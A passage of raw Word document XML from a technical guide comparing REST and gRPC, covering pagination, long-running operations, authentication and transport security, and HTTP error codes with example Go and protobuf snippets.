    <w:p w14:paraId="5F9D2B5D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    FieldMask: &amp;fieldmaskpb.FieldMask{Paths: []string{"name", "email"}},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B958267" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B86750" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>// Server only populates name and email (saves bandwidth for large objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A601CE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pagination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14410C7B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E888042" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message ListOrdersRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD38F1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string customer_id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E7502" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  int32 page_size = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B8027" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string page_token = 3;  // Opaque cursor from previous response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C03B5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2983B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3E86FEC7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>message ListOrdersResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8EEFC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  repeated Order orders = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12251975" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  string next_page_token = 2;  // Empty if no more pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E642A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E655DC0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-running operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA54F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A1C69" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import "google/longrunning/operations.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C90C715" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="7932296C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service DataPipeline {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C084D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc StartPipeline(StartRequest) returns (google.longrunning.Operation);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F873363" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB2665" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1C8CCAD5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client polls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E148F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// GET operation → {done: false, metadata: {progress: 45%}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E77A138" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// GET operation → {done: true, response: {result: ...}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70B111" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="022FB6F2">
          <v:rect id="_x0000_i6536" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0445BD36" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278608A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.1 REST Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1C5025" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B7641" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70349226" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - API keys (header: X-API-Key: abc123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7A348" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - OAuth 2.0 / JWT (header: Authorization: Bearer eyJ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9FD528" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Session cookies (Cookie: session=...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C10466" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D27E9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Authorization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61504AC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Scopes in JWT (scope: "read:users write:orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051133F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - RBAC checked server-side per endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215C541F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13E2E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Transport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3C5BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - HTTPS (TLS) — mandatory for production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F5514E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - CORS headers for browser security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CE3EB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - HSTS (force HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A008C42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="12118A4F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Rate limiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3B35E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - X-RateLimit-Limit: 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134FF9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - X-RateLimit-Remaining: 950</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593EAAB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - X-RateLimit-Reset: 1716912345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427D3F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 gRPC Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FABDDD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C527DAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Transport security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC7777" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - TLS (mutual TLS for service-to-service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7008B7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Channel credentials (configured at connection level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B3150" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="036FCC4B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>Per-call authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD0108" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Call credentials (metadata, like HTTP headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1D7B0D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Token-based (JWT/OAuth token in metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59069855" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EE365" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client with TLS + token:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3696D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>creds := credentials.NewTLS(&amp;tls.Config{...})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44DD51" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>conn, _ := grpc.Dial("service:443",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB3CFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.WithTransportCredentials(creds),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F006A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.WithPerRPCCredentials(tokenAuth{token: "eyJ..."}),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700FA1D2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFE1CA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="3645B675" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Interceptor for auth validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B758990" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func authInterceptor(ctx context.Context, req interface{}, info *grpc.UnaryServerInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572B11BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    handler grpc.UnaryHandler) (interface{}, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A542A85" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F00642" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    md, _ := metadata.FromIncomingContext(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CF8EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    token := md["authorization"][0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40568C1E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if !validateToken(token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A2394" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Errorf(codes.Unauthenticated, "invalid token")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E43C5F2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690DC54E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return handler(ctx, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50572CDB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60C080" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="7B8A2652">
          <v:rect id="_x0000_i6537" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5BA68" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018CDB56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 REST Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C72486" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0D796" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>HTTP status codes as primary error signal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEB6F98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  400 → client sent bad data (fix the request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5224F123" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  401 → not logged in (authenticate first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E439A2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  403 → logged in but not allowed (insufficient permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E1DEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  404 → resource doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E8023" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  429 → too many requests (back off and retry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D96884A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  500 → server bug (retry may help)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F78D53" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  503 → temporarily overloaded (retry with backoff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5682B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0AAA0A3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Response body provides details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3857D772" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF111F9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  "error": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B43F6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "code": "INSUFFICIENT_FUNDS",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7B31A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "message": "Account balance too low for this transaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2C7BC2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    "details": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67947BC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "required": 100.00,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D1A8B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "available": 42.50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD02880" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      "currency": "USD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEA6D1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42848E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E41340" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
